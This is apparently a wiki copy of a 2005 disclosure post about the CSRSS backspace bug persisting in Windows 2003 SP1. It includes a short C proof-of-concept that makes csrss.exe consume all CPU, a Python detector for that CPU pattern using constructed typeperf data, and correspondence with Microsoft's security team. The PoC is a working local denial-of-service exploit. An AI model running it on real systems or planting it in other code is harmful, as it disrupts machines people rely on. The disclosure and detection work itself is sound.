The CSRSS Backspace Bug still works in Windows 2003 SP1


Revision as of 21:23, 30 May 2009

The bug described in [http://homepages.tesco.net/%7EJ.deBoynePollard/FGA/csrss-backspace-bug.html The CSRSS Backspace Bug in Windows NT 4/NT 2000/NT XP] and documented in Microsoft KB article [http://support.microsoft.com/kb/311486 A Program that Passes Invalid Screen Size Parameters Causes an Access Violation] was reportedly fixed in NT 4/2000/XP, but a variation of it still exists in Windows 2003 SP1.

Basically, just compile the program below and run it from a console window: the compiled exploit and csrss.exe together drive processor usage to 100%. The loop writes two tabs followed by six backspaces, forever. Console output on these Windows versions is processed inside csrss.exe (which runs as SYSTEM), so that is where the CPU time ends up. Run it in a real console: if stdout is redirected to a file or a pipe the console subsystem never sees the sequences and nothing happens.

#include <stdio.h>

/* Proof of concept: an endless stream of tabs and backspaces written to the
   console. Run it from a real console window (not redirected), since the
   sequences are interpreted by the console subsystem inside csrss.exe. */
int main(void)
{
    while (1)
        printf("\t\t\b\b\b\b\b\b");   /* two tabs forward, six backspaces back */
    return 0;
}
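One way to confirm that the denial of service is really happening on a test box, as an added example that is not part of the original post: record per-process CPU with typeperf (for instance `typeperf "\Process(*)\% Processor Time" -si 1 -o cpu.csv`) while the program above runs, then look for a window in which csrss.exe, normally close to idle, stays busy for several consecutive samples. The script below parses that PDH-CSV layout and, for each such window, also reports which other process was busiest, which points at the console client driving csrss (the `_Total` and `Idle` instances are excluded so they cannot be mistaken for a client). The sample rows are constructed, the client process name `backspace` and the 25% / 3-sample threshold are assumptions to tune per host.

```python
import csv
import io
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Constructed sample in the layout typeperf writes ("PDH-CSV 4.0"): a header row
# naming each counter, then one row per sample holding a timestamp and one value
# per counter. The figures are invented for illustration, not measurements from
# the original post; "backspace" as the name of the console client is an assumption.
SAMPLE_CSV = r'''"(PDH-CSV 4.0)","\\W2K3SP1\Process(csrss)\% Processor Time","\\W2K3SP1\Process(backspace)\% Processor Time","\\W2K3SP1\Process(explorer)\% Processor Time","\\W2K3SP1\Process(_Total)\% Processor Time"
"12/13/2005 23:32:00.000","0.78","0.00","1.56","2.34"
"12/13/2005 23:32:01.000","1.56","0.00","0.78","2.34"
"12/13/2005 23:32:02.000","47.65","52.34","0.00","99.99"
"12/13/2005 23:32:03.000","49.21","50.78","0.00","99.99"
"12/13/2005 23:32:04.000","48.43","51.56","0.00","99.99"
"12/13/2005 23:32:05.000","50.00","50.00","0.00","100.00"
"12/13/2005 23:32:06.000","49.21","50.78","0.00","99.99"
"12/13/2005 23:32:07.000","0.00","0.00","2.34","2.34"
'''

COUNTER_RE = re.compile(r"\\Process\(([^)]+)\)\\% Processor Time$", re.IGNORECASE)
TIMESTAMP_FMT = "%m/%d/%Y %H:%M:%S.%f"
AGGREGATE_INSTANCES = {"_total", "idle"}   # never the "client" of anything


@dataclass
class HotRun:
    start: datetime
    end: datetime
    samples: int
    peak: float                # highest % Processor Time seen for the target
    companion: Optional[str]   # other process busiest during the same window


def parse_typeperf(text: str) -> List[Tuple[datetime, Dict[str, float]]]:
    """Turn PDH-CSV text into (timestamp, {process_name: percent}) rows."""
    reader = csv.reader(io.StringIO(text))
    header = next(reader)
    names = []
    for path in header[1:]:
        m = COUNTER_RE.search(path)
        names.append(m.group(1).lower() if m else None)   # None: not a per-process counter
    rows = []
    for rec in reader:
        if len(rec) != len(header):
            continue   # truncated row, e.g. typeperf interrupted mid-write
        ts = datetime.strptime(rec[0], TIMESTAMP_FMT)
        values: Dict[str, float] = {}
        for name, raw in zip(names, rec[1:]):
            if name is None:
                continue
            try:
                values[name] = float(raw)
            except ValueError:
                pass   # typeperf leaves the field blank when a counter is unavailable
        rows.append((ts, values))
    return rows


def find_hot_runs(text: str, target: str = "csrss",
                  threshold: float = 25.0, min_samples: int = 3) -> List[HotRun]:
    """Windows in which `target` stays at or above `threshold` % for at least
    `min_samples` consecutive samples. csrss is close to idle on a healthy box,
    so a sustained value well above zero is the signature of a console client
    keeping it busy. Threshold and window length are assumptions to tune per host."""
    runs: List[HotRun] = []
    window: List[Tuple[datetime, Dict[str, float]]] = []

    def close_window() -> None:
        if len(window) >= min_samples:
            busy: Dict[str, float] = {}
            for _, vals in window:
                for name, pct in vals.items():
                    if name != target and name not in AGGREGATE_INSTANCES:
                        busy[name] = busy.get(name, 0.0) + pct
            companion = max(busy, key=busy.get) if busy else None
            runs.append(HotRun(window[0][0], window[-1][0], len(window),
                               max(v[target] for _, v in window), companion))
        window.clear()

    for ts, vals in parse_typeperf(text):
        if vals.get(target, 0.0) >= threshold:
            window.append((ts, vals))
        else:
            close_window()
    close_window()
    return runs


if __name__ == "__main__":
    for run in find_hot_runs(SAMPLE_CSV):
        print(f"csrss busy {run.start:%H:%M:%S}-{run.end:%H:%M:%S}: "
              f"{run.samples} samples, peak {run.peak:.1f}%, busiest client: {run.companion}")
```

On a single-CPU machine the exploit and csrss roughly split the processor, as in the constructed rows, so the threshold is deliberately set well below 100%; what matters is that csrss stays far above its normal near-zero level for consecutive samples, not the exact split.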

Sadly, this seems to be another good example of Microsoft's disrespect for the people who tried to help them. Here are some snippets from the 'Service fix' section of [http://homepages.tesco.net/%7EJ.deBoynePollard/FGA/csrss-backspace-bug.html The CSRSS Backspace Bug in Windows NT 4/NT 2000/NT XP]:

"... Service fix

There will not be further service packs for Windows NT 4. This is a permanent bug in Windows NT 4.

On 2002-03-23, almost five months since this bug became public knowledge and this web page was published, I received an unconfirmed report from a third party that a fixpack that includes a fix for this bug will be released, and that a knowledgebase article covering it "will" be written.

On 2002-08-01, nine and a half months since this bug became public knowledge and this web page was published, Microsoft released the third service pack for Windows NT 2000. With this service pack applied, it appears to be impossible to reproduce this bug. However, neither the change that causes this nor even the bug itself are listed anywhere in either the Windows NT 2000 service pack documentation or in Microsoft's KnowledgeBase. The problem does not officially exist, and is certainly not officially solved. The worry here is that the fact that it is no longer reproducible is coincidental, and (since Microsoft has not recognised it to actually be a problem, and therefore will not include it in any regression testing) liable to be reintroduced by subsequent service packs.

On 2002-09-09, ten and a half months since this bug became public knowledge and this web page was published, Microsoft released the first service pack for Windows NT XP. As with the Windows NT 2000 service pack, there is no official acknowledgement in the service pack documentation either that the bug exists or that it has intentionally been fixed by the service pack. I was unable myself to confirm that the bug is indeed fixed by the service pack, and no-one else had yet reported to me that it is.

On 2002-09-12, the same third party that reported the fixpack information to me reported Microsoft as saying to him that it has "a KB article that should be live soon" and that this will, when it appears, be Microsoft KnowledgeBase article ID Q311486. I confirmed that no article by that ID was currently available.

On 2002-09-24, Microsoft KnowledgeBase article ID Q311486, promised six months ago, finally appeared. Its publication date is falsified to claim that it appeared on 2001-10-26. It talks about programs that "pass invalid screen size parameters" when the sample program code that it gives for replicating the bug clearly contains nothing at all relating to screen size parameters. And the explanation that it gives for the actual cause of the problem is woefully incorrect. Were it not that it has taken over eleven months for Microsoft to produce it, one might think that this article was a very badly done rush job...."

Published 09 December 2005 10:06 by Dinis Cruz


Email to MSRC

From: "Dinis Cruz" <dinis@ddplus.net>
Sent: Tuesday, December 13, 2005 11:32 PM
To: secure@microsoft.com
Subject: The CSRSS Backspace Bug still works in windows 2003 sp1

Dear MSRC

Please see this post, The CSRSS Backspace Bug still works in windows 2003 sp1, for an issue that you should follow up on and research further.

Given the nature of this issue I think that there is a strong possibility that this can be further exploited (note that csrss runs under SYSTEM)

Best regards

Dinis Cruz

Response from MSRC

From: "Microsoft Security Response Center" <secure@microsoft.com>
Sent: Wednesday, December 14, 2005 2:44 PM
To: dinis@ddplus.co.uk
Subject: RE: The CSRSS Backspace Bug still works in windows 2003 sp1

Hello Dinis,

Thanks for your note. I have reopened the case to investigate this and the case manager, Adrian, will be in touch when he has more information.

Thanks, Christopher, CISSP, Security+


Follow-up from MSRC

None until today (23 Jul 2006).